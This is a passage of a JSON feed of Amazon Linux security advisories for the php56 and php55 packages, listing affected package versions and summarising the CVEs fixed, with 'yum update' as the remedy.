"OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-xml-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-xml", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-mcrypt-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-mcrypt", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-process-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-process", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-snmp-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-snmp", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-mysqlnd-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-mysqlnd", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-opcache-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-opcache", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-enchant-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-enchant", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-snmp-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-snmp", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-tidy-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-tidy", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-embedded-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-embedded", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-debuginfo-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-pspell-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-pspell", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-soap-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-soap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-pgsql-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-pgsql", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-imap-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-imap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-mssql-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-mssql", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-mssql-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-mssql", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-intl-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-intl", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-common-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-common", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-dba-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-dba", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-enchant-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-enchant", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-odbc-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-odbc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-recode-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-recode", "operator": "lt"}], "description": "**Issue Overview:**\n\nAn integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened. ([CVE-2015-4021 __](<https://access.redhat.com/security/cve/CVE-2015-4021>))\n\nAn integer overflow flaw leading to a heap based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code. ([CVE-2015-4022 __](<https://access.redhat.com/security/cve/CVE-2015-4022>))\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. ([CVE-2015-4024 __](<https://access.redhat.com/security/cve/CVE-2015-4024>))\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. ([CVE-2015-4025 __](<https://access.redhat.com/security/cve/CVE-2015-4025>))\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. ([CVE-2015-4026 __](<https://access.redhat.com/security/cve/CVE-2015-4026>))\n\nPCRE library is prone to a heap overflow vulnerability. Due to insufficient bounds checking inside compile_branch(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications using it. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. ([CVE-2015-2325 __](<https://access.redhat.com/security/cve/CVE-2015-2325>))\n\nPCRE library is prone to a vulnerability which leads to Heap overflow. Without enough bound checking inside pcre_compile2(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. ([CVE-2015-2326 __](<https://access.redhat.com/security/cve/CVE-2015-2326>))\n\n \n**Affected Packages:** \n\n\nphp56\n\n \n**Issue Correction:** \nRun _yum update php56_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n php56-ldap-5.6.9-1.112.amzn1.i686 \n php56-bcmath-5.6.9-1.112.amzn1.i686 \n php56-cli-5.6.9-1.112.amzn1.i686 \n php56-intl-5.6.9-1.112.amzn1.i686 \n php56-devel-5.6.9-1.112.amzn1.i686 \n php56-common-5.6.9-1.112.amzn1.i686 \n php56-imap-5.6.9-1.112.amzn1.i686 \n php56-gd-5.6.9-1.112.amzn1.i686 \n php56-mysqlnd-5.6.9-1.112.amzn1.i686 \n php56-mssql-5.6.9-1.112.amzn1.i686 \n php56-enchant-5.6.9-1.112.amzn1.i686 \n php56-debuginfo-5.6.9-1.112.amzn1.i686 \n php56-process-5.6.9-1.112.amzn1.i686 \n php56-fpm-5.6.9-1.112.amzn1.i686 \n php56-pdo-5.6.9-1.112.amzn1.i686 \n php56-odbc-5.6.9-1.112.amzn1.i686 \n php56-xml-5.6.9-1.112.amzn1.i686 \n php56-mcrypt-5.6.9-1.112.amzn1.i686 \n php56-recode-5.6.9-1.112.amzn1.i686 \n php56-dba-5.6.9-1.112.amzn1.i686 \n php56-xmlrpc-5.6.9-1.112.amzn1.i686 \n php56-pgsql-5.6.9-1.112.amzn1.i686 \n php56-mbstring-5.6.9-1.112.amzn1.i686 \n php56-pspell-5.6.9-1.112.amzn1.i686 \n php56-5.6.9-1.112.amzn1.i686 \n php56-embedded-5.6.9-1.112.amzn1.i686 \n php56-gmp-5.6.9-1.112.amzn1.i686 \n php56-soap-5.6.9-1.112.amzn1.i686 \n php56-opcache-5.6.9-1.112.amzn1.i686 \n php56-tidy-5.6.9-1.112.amzn1.i686 \n php56-snmp-5.6.9-1.112.amzn1.i686 \n php56-dbg-5.6.9-1.112.amzn1.i686 \n \n src: \n php56-5.6.9-1.112.amzn1.src \n \n x86_64: \n php56-enchant-5.6.9-1.112.amzn1.x86_64 \n php56-gmp-5.6.9-1.112.amzn1.x86_64 \n php56-mysqlnd-5.6.9-1.112.amzn1.x86_64 \n php56-imap-5.6.9-1.112.amzn1.x86_64 \n php56-pgsql-5.6.9-1.112.amzn1.x86_64 \n php56-common-5.6.9-1.112.amzn1.x86_64 \n php56-5.6.9-1.112.amzn1.x86_64 \n php56-soap-5.6.9-1.112.amzn1.x86_64 \n php56-intl-5.6.9-1.112.amzn1.x86_64 \n php56-debuginfo-5.6.9-1.112.amzn1.x86_64 \n php56-opcache-5.6.9-1.112.amzn1.x86_64 \n php56-embedded-5.6.9-1.112.amzn1.x86_64 \n php56-dba-5.6.9-1.112.amzn1.x86_64 \n php56-tidy-5.6.9-1.112.amzn1.x86_64 \n php56-mssql-5.6.9-1.112.amzn1.x86_64 \n php56-fpm-5.6.9-1.112.amzn1.x86_64 \n php56-snmp-5.6.9-1.112.amzn1.x86_64 \n php56-ldap-5.6.9-1.112.amzn1.x86_64 \n php56-dbg-5.6.9-1.112.amzn1.x86_64 \n php56-bcmath-5.6.9-1.112.amzn1.x86_64 \n php56-xmlrpc-5.6.9-1.112.amzn1.x86_64 \n php56-process-5.6.9-1.112.amzn1.x86_64 \n php56-gd-5.6.9-1.112.amzn1.x86_64 \n php56-devel-5.6.9-1.112.amzn1.x86_64 \n php56-mbstring-5.6.9-1.112.amzn1.x86_64 \n php56-recode-5.6.9-1.112.amzn1.x86_64 \n php56-mcrypt-5.6.9-1.112.amzn1.x86_64 \n php56-pspell-5.6.9-1.112.amzn1.x86_64 \n php56-pdo-5.6.9-1.112.amzn1.x86_64 \n php56-odbc-5.6.9-1.112.amzn1.x86_64 \n php56-cli-5.6.9-1.112.amzn1.x86_64 \n php56-xml-5.6.9-1.112.amzn1.x86_64 \n \n \n", "edition": 1, "reporter": "Amazon", "published": "2015-06-02T22:33:00", "title": "Important: php56", "type": "amazon", "enchantments": {"score": {"modified": "2018-10-02T16:55:23", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-2325", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2015-2326"], "modified": "2015-06-02T22:33:00", "id": "ALAS-2015-536", "href": "https://alas.aws.amazon.com/ALAS-2015-536.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-02T16:55:12", "references": [], "affectedPackage": [{"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-embedded-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-embedded", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-process-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-process", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-fpm-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-fpm", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-xmlrpc-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-xmlrpc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-tidy-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-tidy", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-snmp-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-snmp", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-process-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-process", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-enchant-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-enchant", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-pspell-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-pspell", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-mssql-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-mssql", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-mssql-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-mssql", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-debuginfo-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-soap-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-soap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-bcmath-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-bcmath", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-gmp-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-gmp", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-pgsql-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-pgsql", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-cli-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-cli", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-snmp-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-snmp", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-mcrypt-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-mcrypt", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-devel-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-gd-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-gd", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-intl-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-intl", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-tidy-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-tidy", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-imap-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-imap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-recode-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-recode", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-bcmath-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-bcmath", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-xml-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-xml", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-mysqlnd-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-mysqlnd", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-dba-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-dba", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-intl-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-intl", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-xmlrpc-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-xmlrpc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-dba-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-dba", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-common-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-common", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "src", "packageFilename": "php55-5.5.26-1.103.amzn1.src.rpm", "packageName": "php55", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-fpm-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-fpm", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-ldap-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-ldap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-mysqlnd-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-mysqlnd", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-pdo-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-pdo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-mbstring-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-mbstring", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-opcache-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-opcache", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-enchant-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-enchant", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-opcache-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-opcache", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-gd-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-gd", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-ldap-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-ldap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-devel-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-mcrypt-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-mcrypt", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-pdo-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-pdo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-cli-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-cli", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-odbc-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-odbc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-imap-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-imap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-mbstring-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-mbstring", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-pspell-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-pspell", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-recode-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-recode", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-embedded-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-embedded", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-debuginfo-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-gmp-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-gmp", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-pgsql-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-pgsql", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "i686", "packageFilename": "php55-odbc-5.5.26-1.103.amzn1.i686.rpm", "packageName": "php55-odbc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-common-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-common", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-xml-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-xml", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.26-1.103.amzn1", "arch": "x86_64", "packageFilename": "php55-soap-5.5.26-1.103.amzn1.x86_64.rpm", "packageName": "php55-soap", "operator": "lt"}], "description": "**Issue Overview:**\n\nUpstream reports that several bugs have been fixed as well as several security issues into some bundled libraries ([CVE-2015-3414 __](<https://access.redhat.com/security/cve/CVE-2015-3414>), [CVE-2015-3415 __](<https://access.redhat.com/security/cve/CVE-2015-3415>), [CVE-2015-3416 __](<https://access.redhat.com/security/cve/CVE-2015-3416>), [CVE-2015-2325 __](<https://access.redhat.com/security/cve/CVE-2015-2325>) and [CVE-2015-2326 __](<https://access.redhat.com/security/cve/CVE-2015-2326>)). All PHP 5.5 users are encouraged to upgrade to this version. Please see the [upstream release notes](<http://php.net/ChangeLog-5.php#5.5.26>) for full details.\n\n \n**Affected Packages:** \n\n\nphp55\n\n \n**Issue Correction:** \nRun _yum update php55_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n php55-cli-5.5.26-1.103.amzn1.i686 \n php55-odbc-5.5.26-1.103.amzn1.i686 \n php55-dba-5.5.26-1.103.amzn1.i686 \n php55-5.5.26-1.103.amzn1.i686 \n php55-bcmath-5.5.26-1.103.amzn1.i686 \n php55-common-5.5.26-1.103.amzn1.i686 \n php55-mysqlnd-5.5.26-1.103.amzn1.i686 \n php55-xml-5.5.26-1.103.amzn1.i686 \n php55-recode-5.5.26-1.103.amzn1.i686 \n php55-intl-5.5.26-1.103.amzn1.i686 \n php55-devel-5.5.26-1.103.amzn1.i686 \n php55-opcache-5.5.26-1.103.amzn1.i686 \n php55-gd-5.5.26-1.103.amzn1.i686 \n php55-gmp-5.5.26-1.103.amzn1.i686 \n php55-soap-5.5.26-1.103.amzn1.i686 \n php55-ldap-5.5.26-1.103.amzn1.i686 \n php55-imap-5.5.26-1.103.amzn1.i686 \n php55-debuginfo-5.5.26-1.103.amzn1.i686 \n php55-mbstring-5.5.26-1.103.amzn1.i686 \n php55-xmlrpc-5.5.26-1.103.amzn1.i686 \n php55-mcrypt-5.5.26-1.103.amzn1.i686 \n php55-mssql-5.5.26-1.103.amzn1.i686 \n php55-embedded-5.5.26-1.103.amzn1.i686 \n php55-pdo-5.5.26-1.103.amzn1.i686 \n php55-process-5.5.26-1.103.amzn1.i686 \n php55-pspell-5.5.26-1.103.amzn1.i686 \n php55-enchant-5.5.26-1.103.amzn1.i686 \n php55-fpm-5.5.26-1.103.amzn1.i686 \n php55-pgsql-5.5.26-1.103.amzn1.i686 \n php55-tidy-5.5.26-1.103.amzn1.i686 \n php55-snmp-5.5.26-1.103.amzn1.i686 \n \n src: \n php55-5.5.26-1.103.amzn1.src \n \n x86_64: \n php55-pspell-5.5.26-1.103.amzn1.x86_64 \n php55-imap-5.5.26-1.103.amzn1.x86_64 \n php55-embedded-5.5.26-1.103.amzn1.x86_64 \n php55-mcrypt-5.5.26-1.103.amzn1.x86_64 \n php55-5.5.26-1.103.amzn1.x86_64 \n php55-cli-5.5.26-1.103.amzn1.x86_64 \n php55-tidy-5.5.26-1.103.amzn1.x86_64 \n php55-gd-5.5.26-1.103.amzn1.x86_64 \n php55-odbc-5.5.26-1.103.amzn1.x86_64 \n php55-process-5.5.26-1.103.amzn1.x86_64 \n php55-mbstring-5.5.26-1.103.amzn1.x86_64 \n php55-gmp-5.5.26-1.103.amzn1.x86_64 \n php55-mssql-5.5.26-1.103.amzn1.x86_64 \n 